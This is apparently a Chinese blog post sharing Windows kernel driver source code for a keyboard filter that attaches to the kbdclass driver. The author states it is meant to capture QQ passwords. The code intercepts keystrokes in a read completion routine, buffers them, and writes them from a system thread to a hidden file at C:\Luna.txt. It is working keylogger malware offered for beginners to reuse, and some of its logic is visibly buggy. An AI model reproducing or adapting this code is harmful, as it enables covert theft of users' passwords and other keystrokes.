標籤:
寒江獨釣鍵盤過濾,修改了下,過濾QQ密碼寫入buff,有 斷行符號 或者buff滿寫入檔案,因為irp完成,irp對應的記憶體快回收,所以用全域緩衝區。開啟一個線程寫入,開始打算用隊例一個一個處理irp的,但是發現那樣比較緩慢,只好這樣了。。建立進程回調代碼加幾行就行,這裡沒寫,因為代碼丟失了,算是個大概的代碼吧。給初學的分享下。有錯指出,謝謝。
前輩們不要見笑了。
struct.h
/************************************///author:DuanYueming//data: 02/05/2015//File: Lstruct.h /************************************/#ifndef _LSTRUCT_H_#define _LSTRUCT_H_typedef struct _DEVICE_EXTENSION {PDEVICE_OBJECT pDeviceObj;PDEVICE_OBJECT pAttachDev; //上層裝置PDEVICE_OBJECT pLowDevice; //底層裝置PDEVICE_OBJECT pStorageDev; //儲存的裝置PDEVICE_OBJECT pTarDevice; //目標裝置UNICODE_STRING MyDeviceName;UNICODE_STRING MyDeviceSym;ULONG pMyDevFlg;IO_REMOVE_LOCK MoveLock;}DEVICE_EXTENSION,*PDEVICE_EXTENSION;typedef struct _MultVar{ PVOID pBuff; KEVENT WaitEvent; ULONG Length;}MULTVAR,*PMULTVAR;#define BUFF_SIZE 256typedef struct _MY_BUFF{PUCHAR pBuf;int MaxSize;int CurSize;int Offset;}MYBUFF,*PMYBUFF;typedef struct _MY_DATA{ PIRP Irp;PVOID pBuff;LIST_ENTRY ListEntry;}MY_DATA,*PMYDATA;
#define MyDeviceFlags ‘LUNA‘#define MyCdoDeviceFlags ‘LCdo‘#define RemoveTag ‘Lmn‘#define DELAY_ONE_MICROSECOND (-10)#define DELAY_ONE_MILLISECOND (DELAY_ONE_MICROSECOND*1000)#define DELAY_ONE_SECOND (DELAY_ONE_MILLISECOND*1000)#define IS_MY_DEVICE_OBJECT(_obj) (((PDEVICE_EXTENSION)_obj->DeviceExtension)->pMyDevFlg == MyCdoDeviceFlags || PDEVICE_EXTENSION(_obj->DeviceExtension)->pMyDevFlg == MyDeviceFlags)#define IS_MY_CONTROL_DEVICE(_obj) (((PDEVICE_EXTENSION)_obj->DeviceExtension)->pMyDevFlg == MyCdoDeviceFlags)
/********未歸檔函數************/NTSTATUSObReferenceObjectByName(PUNICODE_STRING ObjectName,ULONG Attributes,PACCESS_STATE AccessState,ACCESS_MASK DesiredAccess,POBJECT_TYPE ObjectType,KPROCESSOR_MODE AccessMode,PVOID ParseContext,PVOID *Object);extern POBJECT_TYPE *IoDriverObjectType;
NTSTATUS LQueryObjectName(PVOID Lobject,PUNICODE_STRING name)//查詢檔案名稱{NTSTATUS status;POBJECT_NAME_INFORMATION pBuff;WCHAR cache[64];ULONG NeedLength;pBuff = (POBJECT_NAME_INFORMATION)cache;status = ObQueryNameString(Lobject,pBuff,64*sizeof(WCHAR),&NeedLength);if (status == STATUS_INFO_LENGTH_MISMATCH){pBuff =(POBJECT_NAME_INFORMATION) ExAllocatePool(NonPagedPool,NeedLength);if (pBuff == NULL){return STATUS_INSUFFICIENT_RESOURCES;}RtlZeroMemory(pBuff,NeedLength);status = ObQueryNameString(Lobject,pBuff,NeedLength,&NeedLength);}name->Length = 0;RtlCopyUnicodeString(name,&pBuff->Name);return status;}VOID LUnInstallDriver(PDRIVER_OBJECT pDriverObject){ PDEVICE_EXTENSION pDevExt;PRKTHREAD CurrentThread;LARGE_INTEGER time;PDEVICE_OBJECT pDevObj;time = RtlConvertLongToLargeInteger(100*DELAY_ONE_SECOND);pDevObj = pDriverObject->DeviceObject;CurrentThread = KeGetCurrentThread();KeSetPriorityThread(CurrentThread,LOW_REALTIME_PRIORITY);while (pDevObj){pDevExt =(PDEVICE_EXTENSION) pDevObj->DeviceExtension;IoDeleteSymbolicLink(&pDevExt->MyDeviceSym);pDevObj = pDevObj->NextDevice;IoDetachDevice(pDevExt->pLowDevice);IoDeleteDevice(pDevExt->pDeviceObj);}while (1){}KdPrint(("Driver UnInstall Complete,leave\n"));}NTSTATUS LDispatchRoutine(PDEVICE_OBJECT pDeviceObject,PIRP pIrp){ PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(pIrp);IoSkipCurrentIrpStackLocation(pIrp);return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObject->DeviceExtension)->pLowDevice,pIrp);}
以下是代碼:
#include "QFilter.h"NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath){int i;NTSTATUS status;HANDLE Thread;/********初始化全域變數***********/IsWriteData = FALSE;IsNeedFilter = FALSE;InitializeListHead(&g_list);g_buff =(PMYBUFF) ExAllocatePool(NonPagedPool,sizeof(MYBUFF));if (g_buff ==NULL){KdPrint(("no through memory \n"));return 0;}else{g_buff->pBuf =(PUCHAR)ExAllocatePool(NonPagedPool,BUFF_SIZE);ASSERT(g_buff->pBuf);g_buff->MaxSize = BUFF_SIZE;g_buff->Offset = 0;g_buff->CurSize = 0;}/********初始化全域變數***********/pDriverObject->DriverUnload = LUnInstallDriver;for (i = 0;i <IRP_MJ_MAXIMUM_FUNCTION;i++){pDriverObject->MajorFunction[i] = LDispatchRoutine;}pDriverObject->MajorFunction[IRP_MJ_READ] = ReadRoutine;pDriverObject->MajorFunction[IRP_MJ_POWER] = PowerRoutine;pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ContrlRoutine;//pDriverObject->MajorFunction[IRP_MJ_CLOSE] = CloseIrp;status = CreateMyCDODevice(pDriverObject);if (!NT_SUCCESS(status)){return status;}status = BindKbdDriver(pDriverObject);if (!NT_SUCCESS(status)){return status;}status = PsCreateSystemThread(&Thread,GENERIC_ALL,NULL,NULL,NULL,ProcessIrp,NULL);if (!NT_SUCCESS(status)){KdPrint(("Create Thread Failed \n"));return status;}KdPrint(("Start Kbd Filter SuccessFuly \n"));return STATUS_SUCCESS;}VOID ProcessIrp(PVOID pContext){ //PMYDATA data;PVOID buff = NULL; for (;;) { // PLIST_ENTRY HeadData = RemoveHeadList(&g_list);//data = CONTAINING_RECORD(HeadData,MY_DATA,ListEntry);if (IsWriteData == TRUE&& g_buff->pBuf != NULL){ KdPrint(("hehehehe\n"));KdPrint(("111\n"));KdPrint(("2222\n"));MyWriteDataFile();RtlZeroMemory(g_buff->pBuf,g_buff->MaxSize);g_buff->CurSize = 0;g_buff->Offset = 0;} }}NTSTATUS PowerRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp){ PoStartNextPowerIrp(pIrp); IoSkipCurrentIrpStackLocation(pIrp); return PoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);}NTSTATUS CreateMyCDODevice(PDRIVER_OBJECT pDriverObj){NTSTATUS status;UNICODE_STRING DevSym;UNICODE_STRING DevName;PDEVICE_OBJECT pNewDev;PDEVICE_EXTENSION pDevExt;RtlInitUnicodeString(&DevName,L"\\Device\\QFilter");status = IoCreateDevice(pDriverObj,sizeof(DEVICE_EXTENSION),&DevName,FILE_DEVICE_UNKNOWN,0,TRUE,&pNewDev);if (!NT_SUCCESS(status)){ KdPrint(("Create CDO DevObj Failed \n")); return status;}RtlInitUnicodeString(&DevSym,L"\\??\\QFilterSym"); status = IoCreateSymbolicLink(&DevSym,&DevName);if (!NT_SUCCESS(status)){KdPrint(("Create Cdo Symbolic Failed \n"));IoDeleteDevice(pNewDev);return status;}pNewDev->Flags |=DO_BUFFERED_IO;pDevExt = (PDEVICE_EXTENSION)pNewDev->DeviceExtension;pDevExt->pMyDevFlg = MyCdoDeviceFlags;pDevExt->MyDeviceName = DevName;pDevExt->pDeviceObj = pNewDev;pDevExt->MyDeviceSym = DevSym;return STATUS_SUCCESS;}NTSTATUS BindKbdDriver(PDRIVER_OBJECT pDriverObj){UNICODE_STRING kbdClass;PDEVICE_OBJECT pNewDev;PDEVICE_OBJECT pTarDev;PDEVICE_OBJECT pLowDev;PDEVICE_EXTENSION pDevExt;PDRIVER_OBJECT pKbdDrOb;NTSTATUS status = STATUS_SUCCESS;RtlInitUnicodeString(&kbdClass,L"\\Driver\\kbdclass");status = ObReferenceObjectByName(&kbdClass,OBJ_CASE_INSENSITIVE,NULL,0,*IoDriverObjectType,KernelMode,NULL,(PVOID*)&pKbdDrOb);if (!NT_SUCCESS(status)){KdPrint(("Load KbdObj Failed :%x\n",status));return status;}ObDereferenceObject(pKbdDrOb);pTarDev = pKbdDrOb->DeviceObject;while (pTarDev){status = IoCreateDevice(pDriverObj,sizeof(DEVICE_EXTENSION),NULL,pTarDev->DeviceType,pTarDev->Characteristics,FALSE,&pNewDev);if (!NT_SUCCESS(status)){KdPrint(("Create Device Failed:%x\n",status));return status;}else{status = IoAttachDeviceToDeviceStackSafe(pNewDev,pTarDev,&pLowDev);if (!NT_SUCCESS(status)){ KdPrint(("Bind Failed \n"));return status;} pDevExt = (PDEVICE_EXTENSION)pNewDev->DeviceExtension;pNewDev->Flags |= pLowDev->Flags&(DO_BUFFERED_IO | DO_DIRECT_IO |DO_POWER_PAGABLE);pNewDev->Flags &= ~DO_DEVICE_INITIALIZING;pDevExt->pDeviceObj = pNewDev;pDevExt->pMyDevFlg = MyDeviceFlags;pDevExt->pLowDevice = pLowDev;pDevExt->pAttachDev = pTarDev;pNewDev->StackSize = pDevExt->pLowDevice->StackSize+1;//IoInitializeRemoveLock(&pDevExt->MoveLock,0,0,0);}pTarDev = pTarDev->NextDevice;}RtlInitUnicodeString(&FileName,L"\\DosDevices\\C:\\Luna.txt");KdPrint(("Complete Device Bind \n"));return STATUS_SUCCESS;}VOID MyWriteDataFile(){ HANDLE handl;OBJECT_ATTRIBUTES objAttr;IO_STATUS_BLOCK block;NTSTATUS status; InitializeObjectAttributes(&objAttr,&FileName,OBJ_CASE_INSENSITIVE,NULL,NULL);status = ZwCreateFile(&handl,GENERIC_WRITE,&objAttr,&block,NULL,FILE_ATTRIBUTE_NORMAL,0,FILE_OPEN_IF,FILE_SYNCHRONOUS_IO_NONALERT,NULL,0);if (!NT_SUCCESS(status)){KdPrint(("Create File Storage data Failed:%x",status));return;}status = ZwWriteFile(handl,NULL,NULL,NULL,&block,g_buff->pBuf,g_buff->CurSize,0,NULL);if (!NT_SUCCESS(status)){KdPrint(("WriteFile Failed:%X \n",status));ZwClose(handl);return;}KdPrint((" code:%C \n",g_buff->pBuf)); ZwClose(handl);}NTSTATUS ReadCompleteFun(PDEVICE_OBJECT pDeviceObj,PIRP pIrp,PVOID pContext){ ULONG KeyStructNum;PKEYBOARD_INPUT_DATA ptr;ULONG i;UCHAR ASCIICODE;if(/*IsNeedFilter &&*/NT_SUCCESS(pIrp->IoStatus.Status) ){ KeyStructNum = pIrp->IoStatus.Information/(pIrp->IoStatus.Information/sizeof(KEYBOARD_INPUT_DATA)); ptr =(PKEYBOARD_INPUT_DATA) pIrp->AssociatedIrp.SystemBuffer; for (i =0 ;i <KeyStructNum;++i) { ASCIICODE = print_keystroke(ptr[i].MakeCode); if(g_buff->Offset >= (BUFF_SIZE-(5*UCHARSIZE)) || ASCIICODE == ‘0x0D‘) { KdPrint(("steup write data!!!!!!!!!!!!!!!!!!!\n")); IsWriteData =TRUE; RtlCopyMemory(((g_buff->pBuf)+(g_buff->Offset)),&ASCIICODE,UCHARSIZE); g_buff->Offset += UCHARSIZE; g_buff->CurSize +=UCHARSIZE; } else { IsWriteData =FALSE; KdPrint(("------buff small---Start Write Data to File-- \n")); } }} if (pIrp->PendingReturned) { IoMarkIrpPending(pIrp); }return pIrp->IoStatus.Status;}NTSTATUS ReadRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp){ PIO_STACK_LOCATION stack; NTSTATUS status = STATUS_SUCCESS; if (pIrp->CurrentLocation ==1) { pIrp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST; pIrp->IoStatus.Information = 0; IoCompleteRequest(pIrp,IO_NO_INCREMENT); return STATUS_INVALID_DEVICE_REQUEST; } if (IS_MY_CONTROL_DEVICE(pDeviceObj)) { pIrp->IoStatus.Status = STATUS_SUCCESS; pIrp->IoStatus.Information = 0; IoCompleteRequest(pIrp,IO_NO_INCREMENT); return STATUS_SUCCESS; } stack = IoGetCurrentIrpStackLocation(pIrp); IoCopyCurrentIrpStackLocationToNext(pIrp); IoSetCompletionRoutine(pIrp,ReadCompleteFun,NULL,TRUE,TRUE,TRUE); return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);}NTSTATUS ContrlRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp){PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(pIrp);if (IS_MY_CONTROL_DEVICE(pDeviceObj)){switch(stack->Parameters.DeviceIoControl.IoControlCode){}}switch(stack->Parameters.DeviceIoControl.IoControlCode){default: IoSkipCurrentIrpStackLocation(pIrp); return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);}}
Windows驅動過濾--kdbclass過濾,寒江獨釣加強版
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
